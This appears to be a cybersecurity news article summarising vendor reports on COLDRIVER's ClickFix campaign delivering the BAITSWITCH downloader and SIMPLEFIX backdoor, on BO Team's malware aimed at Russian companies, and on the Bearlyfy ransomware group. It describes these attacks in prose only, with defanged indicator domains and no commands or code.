The Russian advanced persistent threat (APT) group known as COLDRIVER has been attributed to a fresh round of ClickFix-style attacks designed to deliver two new “lightweight” malware families tracked as BAITSWITCH and SIMPLEFIX.
Zscaler ThreatLabz, which detected the new multi-stage ClickFix campaign earlier this month, described BAITSWITCH as a downloader that ultimately drops SIMPLEFIX, a PowerShell backdoor.
COLDRIVER, also tracked as Callisto, Star Blizzard, and UNC4057, is the moniker assigned to a Russia-linked threat actor that’s known to target a wide range of sectors since 2019. While early campaign waves were observed using spear-phishing lures to direct targets to credential harvesting pages, the group has been fleshing out its arsenal with custom tools like SPICA and LOSTKEYS, which underscores its technical sophistication.
The adversary’s use of ClickFix tactics was previously documented by the Google Threat Intelligence Group (GTIG) back in May 2025, using fake sites serving fake CAPTCHA verification prompts to trick the victim into executing a PowerShell command that’s designed to deliver the LOSTKEYS Visual Basic Script.
“The continued use of ClickFix suggests that it is an effective infection vector, even if it is neither novel nor technically advanced,” Zscaler security researchers Sudeep Singh and Yin Hong Chang said in a report published this week.
The latest attack chain follows the same modus operandi, tricking unsuspecting users into running a malicious DLL in the Windows Run dialog under the guise of completing a CAPTCHA check. The DLL, BAITSWITCH, reaches out to an attacker-controlled domain (“captchanom[.]top”) to fetch the SIMPLEFIX backdoor, while a decoy document hosted on Google Drive is presented to the victims.
It also makes several HTTP requests to the same server to send system information, receive commands to establish persistence, store encrypted payloads in the Windows Registry, download a PowerShell stager, clear the most recent command executed in the Run dialog, effectively erasing traces of the ClickFix attack that triggered the infection.
The downloaded PowerShell stager subsequently reaches out to an external server (“southprovesolutions[.]com”) to download SIMPLEFIX, which, in turn, establishes communication with a command-and-control (C2) server to run PowerShell scripts, commands, and binaries hosted on remote URLs.
One of the PowerShell scripts executed via SIMPLEFIX exfiltrates information about a hard-coded list of file types found in a pre-configured list of directories. The list of directories and file extensions scanned shares overlaps with that of LOSTKEYS.
“The COLDRIVER APT group is known for targeting members of NGOs, human right defenders, think tanks in Western regions, as well as individuals exiled from and residing in Russia,” Zscaler said. “The focus of this campaign closely aligns with their victimology, which targets members of civil society connected to Russia.”
BO Team and Bearlyfy Target Russia
The development comes as Kaspersky said it observed a new phishing campaign targeting Russian companies in early September undertaken by the BO Team group (aka Black Owl, Hoody Hyena, and Lifting Zmiy) using password-protected RAR archives to deliver a new version of BrockenDoor rewritten in C# and an updated version of ZeronetKit.
A Golang backdoor, ZeronetKit, comes fitted with capabilities to support remote access to compromised hosts, upload/download files, execute commands using cmd.exe, and create a TCP/IPv4 tunnel. Select newer versions also incorporate support for downloading and running shellcode, as well as update the communication interval with C2 and modify the C2 server list.
“ZeronetKit is unable to independently persist on an infected system, so attackers use BrockenDoor to copy the downloaded backdoor to startup,” the Russian cybersecurity vendor said.
It also follows the emergence of a new group called Bearlyfy that has used ransomware strains like LockBit 3.0 and Babuk in attacks targeting Russia, initially attacking smaller companies for smaller ransoms before graduating to bigger firms in the country starting April 2025, according to F6. As of August 2025, the group is estimated to have claimed at least 30 victims.
In one incident targeting a consulting company, the threat actors have been observed weaponizing a vulnerable version of Bitrix for initial access, followed by using the Zerologon flaw to escalate privileges. In another case observed in July, the initial access is said to have been facilitated through an unnamed partner company.
“In the most recent recorded attack, the attackers demanded €80,000 in cryptocurrency, while in the first attack, the ransom was several thousand dollars,” F6 researchers said. “Due to the relatively low ransom amounts, on average, every fifth victim buys decryptors from the attackers.”
Bearlyfy is assessed to be active since January 2025, with a deeper analysis of its tools uncovering infrastructure overlaps with a likely pro-Ukrainian threat group called PhantomCore, which has a track record of targeting Russian and Belarusian companies since 2022. Despite these similarities, Bearlyfy is believed to be an autonomous entity.
“PhantomCore implements complex, multi-stage attacks typical of APT campaigns,” the company said. “Bearlyfy, on the other hand, uses a different model: attacks with minimal preparation and a targeted focus on achieving an immediate effect. Initial access is achieved through exploitation of external services and vulnerable applications. The primary toolkit is aimed at encryption, destruction, or modification of data.”
